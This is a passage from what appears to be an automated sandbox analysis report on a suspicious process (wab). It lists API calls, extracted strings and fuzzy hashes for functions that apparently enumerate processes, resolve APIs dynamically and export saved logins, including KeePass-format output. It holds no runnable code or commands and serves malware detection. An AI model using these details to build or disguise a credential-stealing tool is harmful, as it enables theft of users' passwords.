                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                          • String ID: logins$null
                                          • API String ID: 3492182834-2163367763
                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          • memset.MSVCRT ref: 004085CF
                                          • memset.MSVCRT ref: 004085F1
                                          • memset.MSVCRT ref: 00408606
                                          • strcmp.MSVCRT ref: 00408645
                                          • _mbscpy.MSVCRT ref: 004086DB
                                          • _mbscpy.MSVCRT ref: 004086FA
                                          • memset.MSVCRT ref: 0040870E
                                          • strcmp.MSVCRT ref: 0040876B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                          • String ID: ---
                                          • API String ID: 3437578500-2854292027
                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0041087D
                                          • memset.MSVCRT ref: 00410892
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                          • DeleteObject.GDI32(?), ref: 004109D0
                                          • DeleteObject.GDI32(?), ref: 004109D6
                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          • API String ID: 1010922700-0
                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                          • malloc.MSVCRT ref: 004186B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                          • malloc.MSVCRT ref: 004186FE
                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$FullNamePath$malloc$Version
                                          • String ID: |A
                                          • API String ID: 4233704886-1717621600
                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp
                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                          • API String ID: 2081463915-1959339147
                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                          • API String ID: 2012295524-70141382
                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 667068680-3953557276
                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 004121FF
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                          • SelectObject.GDI32(?,?), ref: 00412251
                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                          • SetCursor.USER32(00000000), ref: 004122BC
                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                          • memcpy.MSVCRT ref: 0041234D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                          • String ID:
                                          • API String ID: 1700100422-0
                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                          • String ID:
                                          • API String ID: 552707033-0
                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                          Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                          • memcpy.MSVCRT ref: 0040C11B
                                          • strchr.MSVCRT ref: 0040C140
                                          • strchr.MSVCRT ref: 0040C151
                                          • _strlwr.MSVCRT ref: 0040C15F
                                          • memset.MSVCRT ref: 0040C17A
                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                          • String ID: 4$h
                                          • API String ID: 4066021378-1856150674
                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf
                                          • String ID: %%0.%df
                                          • API String ID: 3473751417-763548558
                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                          • GetTickCount.KERNEL32 ref: 0040610B
                                          • GetParent.USER32(?), ref: 00406136
                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                          • String ID: A
                                          • API String ID: 2892645895-3554254475
                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                          • memset.MSVCRT ref: 0040DA23
                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                          • String ID: caption
                                          • API String ID: 973020956-4135340389
                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf$wcscpy
                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                          • API String ID: 1283228442-2366825230
                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcschr.MSVCRT ref: 00413972
                                          • wcscpy.MSVCRT ref: 00413982
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                          • wcscpy.MSVCRT ref: 004139D1
                                          • wcscat.MSVCRT ref: 004139DC
                                          • memset.MSVCRT ref: 004139B8
                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                          • memset.MSVCRT ref: 00413A00
                                          • memcpy.MSVCRT ref: 00413A1B
                                          • wcscat.MSVCRT ref: 00413A27
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                          • String ID: \systemroot
                                          • API String ID: 4173585201-1821301763
                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy
                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                          • API String ID: 1284135714-318151290
                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                          • String ID: 0$6
                                          • API String ID: 4066108131-3849865405
                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004082EF
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                          • memset.MSVCRT ref: 00408362
                                          • memset.MSVCRT ref: 00408377
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
